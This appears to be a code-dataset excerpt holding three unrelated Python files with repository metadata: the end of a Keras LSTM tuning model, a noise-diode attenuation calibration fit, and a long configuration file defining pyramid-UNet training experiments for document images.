min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-5,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
        return model
| [
"[email protected]"
] | |
61d903d2962755912aa8dac21eaa78b97774cbf8 | 5b473f7876104de55b0ac19616c9ef0976c2f224 | /cals/NoiseDiode/ND_atten_fit.py | ab7a122198042084db22e7ce4274e87374b7e8a6 | [] | no_license | SDRAST/Receivers_WBDC | 80f3c2481fb09b9875b9ecd1687a4cc194ab9005 | 3e1d49d3daf361608331fcdf3c6c3e41b4ad9de9 | refs/heads/master | 2022-12-23T20:21:22.281484 | 2020-09-30T23:00:19 | 2020-09-30T23:00:19 | 291,369,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,642 | py | # -*- coding: utf-8 -*-
"""
These data are from the calibration log for Fri Apr 8 16:03:55 2011
Add ctrl_voltage as a method to ND. ND should probably be raised to a class
"""
import numpy as NP
from pylab import *
import scipy
def ctrl_voltage(ND):
coefs = array([ 3.85013993e-18, -6.61616152e-15, 4.62228606e-12,
-1.68733555e-09, 3.43138077e-07, -3.82875899e-05,
2.20822016e-03, -8.38473034e-02, 1.52678586e+00])
    return NP.polyval(coefs, ND)  # numpy stands in for the long-removed scipy.polyval
data = NP.array([
[-6.00, -28.716],
[-5.75, -28.732],
[-5.50, -28.757],
[-5.25, -28.797],
[-5.00, -28.851],
[-4.75, -28.928],
[-4.50, -29.035],
[-4.25, -29.179],
[-4.00, -29.355],
[-3.75, -29.555],
[-3.50, -29.775],
[-3.25, -29.992],
[-3.00, -30.189],
[-2.75, -30.378],
[-2.50, -30.548],
[-2.25, -30.691],
[-2.00, -30.822],
[-1.75, -30.926],
[-1.50, -31.028],
[-1.25, -31.109],
[-1.00, -31.206],
[-0.75, -31.296],
[-0.50, -31.388],
[-0.25, -31.498],
[ 0.00, -31.612],
[ 0.25, -31.747],
[ 0.50, -31.880],
[ 0.75, -31.995],
[ 1.00, -32.078],
[ 1.25, -32.116],
[ 1.50, -32.136],
[ 1.75, -32.144]])
ctrlV = data[:,0]
pwr_dB = data[:,1]
pwr_W = pow(10.,pwr_dB/10)
min_pwr = pwr_W.min()
max_pwr = pwr_W.max()
gain = 320/min_pwr
TsysMax = gain*max_pwr # assuming the system was linear, which it was
print "Tsys with full ND =",TsysMax
NDmax = TsysMax-320
print "Tnd(max) =",NDmax
ND =gain*pwr_W - 320
plot(ND,ctrlV)
ylabel("Control Voltage (V)")
xlabel("Noise Diode (K)")
grid()
coefs = NP.polyfit(ND, ctrlV, 8)  # numpy stands in for the long-removed scipy.polyfit
print(coefs)
vctrl_voltage = NP.vectorize(ctrl_voltage)
x = arange(0,350,10)
plot(x,vctrl_voltage(x),'ro')
show()
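# Sketch of the class the module docstring asks for (an assumption; nothing
# below comes from the calibration log):
#
#     class NoiseDiode(object):
#         """Noise diode with a polynomial control-voltage model."""
#         def __init__(self, coefs):
#             self.coefs = coefs
#         def ctrl_voltage(self, ND):
#             return NP.polyval(self.coefs, ND)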
| [
"[email protected]"
] | |
8ab81a05046b4fbe1d20f70062f9411fee994e8d | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/doc3d/I_to_M_Gk3_no_pad/pyr_Tcrop255_pad20_jit15/Sob_k17_s001/pyr_4s/L4/step10_a.py | 75773149c2e2458db22e88582b00384156b134b7 | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41,921 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### Add kong_model2 to sys.path
import os
code_exe_path = os.path.realpath(__file__)                                   ### path of the currently executing step10_b.py
code_exe_path_element = code_exe_path.split("\\")                            ### split the path; used below to find which level kong_model2 sits at
code_dir = "\\".join(code_exe_path_element[:-1])
kong_layer = code_exe_path_element.index("kong_model2")                      ### find which level kong_model2 sits at
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1])          ### locate the kong_model2 dir
import sys                                                                   ### add kong_model2 to sys.path
sys.path.append(kong_model2_dir)
sys.path.append(code_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" code_dir:", code_dir)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
kong_to_py_layer = len(code_exe_path_element) - 1 - kong_layer               ### the -1 in the middle converts a length into an index
# print("    kong_to_py_layer:", kong_to_py_layer)
if  (kong_to_py_layer == 0): template_dir = ""
elif(kong_to_py_layer == 2): template_dir = code_exe_path_element[kong_layer + 1][0:]  ### [7:] would drop the "step1x_" prefix; keeping meaningful names turned out fine, so this was changed to 0
elif(kong_to_py_layer == 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:]  ### [5:] would drop the "mask_" prefix (added only because Python module names cannot start with a digit); the automatic ordering is acceptable, so this was changed to 0
elif(kong_to_py_layer >  3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:] + "/" + "/".join(code_exe_path_element[kong_layer + 3: -1])
# print("    template_dir:", template_dir)  ### e.g. template_dir: 7_mask_unet/5_os_book_and_paper_have_dtd_hdr_mix_bg_tv_s04_mae
#############################################################################################################################################################################################################
exp_dir = template_dir
#############################################################################################################################################################################################################
from step06_a_datas_obj import *
from step09_4side_L4 import *
from step10_a2_loss_info_obj import *
from step10_b2_exp_builder import Exp_builder
rm_paths = [path for path in sys.path if code_dir in path]
for rm_path in rm_paths: sys.path.remove(rm_path)
rm_moduless = [module for module in sys.modules if "step09" in module]
for rm_module in rm_moduless: del sys.modules[rm_module]
#############################################################################################################################################################################################################
'''
exp_dir is the folder one level ABOVE result_dir, i.e. it decides where the results live! A nested exp_dir is fine too~
For example, with exp_dir = "6_mask_unet/some_name_of_your_own", every result_dir sits under:
    6_mask_unet/some_name_of_your_own/result_a
    6_mask_unet/some_name_of_your_own/result_b
    6_mask_unet/some_name_of_your_own/...
'''
use_db_obj = type8_blender_kong_doc3d_in_I_gt_MC
use_loss_obj = [G_sobel_k17_loss_info_builder.set_loss_target("UNet_Mask").copy()] ### the z, y, x ordering follows step07_b_0b_Multi_UNet
#############################################################
### Build an empty Exp_builder so result_analyze can draw blank placeholder figures
empty = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_1__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="為了resul_analyze畫空白的圖,建一個empty的 Exp_builder")
#############################################################
# 1 3 6 10 15 21 28 36 45 55
# side1 OK 1
ch032_1side_1__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_1__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
# 1 "3" 6 10 15 21 28 36 45 55
# side2 OK 4
ch032_1side_2__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_2__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_2__2side_2__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_2__2side_2__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_2__2side_2__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
# 1 3 "6" 10 15 21 28 36 45 55
# side3 OK 10
ch032_1side_3__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_2__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_2__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_2__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
# 1 3 6 "10" 15 21 28 36 45 55
# side4 OK 20
ch032_1side_4__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_2__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_2__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_2__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_4_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_4_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_4_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_4, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_4_4side_4.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
# 1 3 6 10 "15" 21 28 36 45 55
# side5 OK 35
ch032_1side_5__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_2__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_2__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_2__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
